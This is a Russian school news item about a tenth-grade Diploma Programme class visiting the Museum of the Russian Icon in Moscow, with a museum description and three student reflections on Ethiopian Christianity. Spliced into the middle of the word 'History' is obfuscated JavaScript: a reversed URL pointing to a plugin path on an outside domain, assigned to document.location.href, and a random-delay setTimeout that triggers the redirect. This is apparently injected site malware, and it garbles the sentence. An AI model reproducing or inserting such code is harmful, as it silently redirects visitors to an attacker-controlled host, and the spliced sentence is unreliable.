logo

10-классники, студенты Дипломной программы посетили музейный комплекс на Таганке — Музей русской иконы

Сегодня музей русской иконы — это не только самая крупная в России и значительная по уровню произведений частное собрание, насчитывающее около 5000 экспонатов, но и, безусловно, самая широкая по охвату материала. Оно включает раннехристианские и византийские древности 6-14 веков, некоторые из них не имеет аналогов даже в крупных музеях страны, греческие памятники, а также обширную коллекцию произведений христианской культуры Эфиопии. Основу коллекции составляют около 1000 произведений русской иконописи, которые отличаются многообразие иконографии, высоким художественный уровнем и широкими временными рамками. Самая ранняя русская икона коллекции датируется 14 веком.
Музей русской иконы — это единственная в России частная коллекция византийского и древнерусского искусства, официально преобразованная в общедоступный музей.
Музей представляет особый интерес для наших студентов, изучающих предметы Arts и Histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory, а также для всех, интересующихся русской культурой.

Моавад Мариам, 10 класс Дипломной программы
В субботу, 22 мая мы с одноклассниками посетили Музей Русской Иконы. Там мы побывали на экскурсии по Эфиопскому христианству, на которой мы узнали много нового и интересного. Эти знания мне пригодятся на моем курсе по предмету Arts. После экскурсии, я провела много времени, прогуливаясь по залам русских икон, картин и скульптур. Спасибо нашему куратору, за такую превосходную возможность духовного развития!

Степушин Антон, 10 класс Дипломной программы
В преддверии летних каникул очень понравилась поездка в музей Русской иконы. Было интересно послушать про историю и искусство Эфиопии и развития Христианства там. Была возможность посмотреть сохранившиеся иконы. Расположение музея было очень интересным, после музея мы прогулялись по старым улочкам Москвы и пообщались!

Румянцев Клим, 10 класс Дипломной программы
В субботу, мы по традиции съездили в один из музеев Москвы. В этот раз, это была частная коллекция икон, а экскурсия была посвящена Христианству в Эфиопии. Интересный факт, что Эфиопия приняла Христианство за 600 лет до России. Эфиопская церковь считается независимой, причисляет себя к православной ветви, с российским православием ее роднит календарь, дни поста, некоторые обряды и религиозные праздники. Мне, как изучающему Историю в Дипломной программе эта экскурсия была крайне полезна.

Материал подготовила куратор 10 кл, учитель английского языка Лана Васильевна Федорова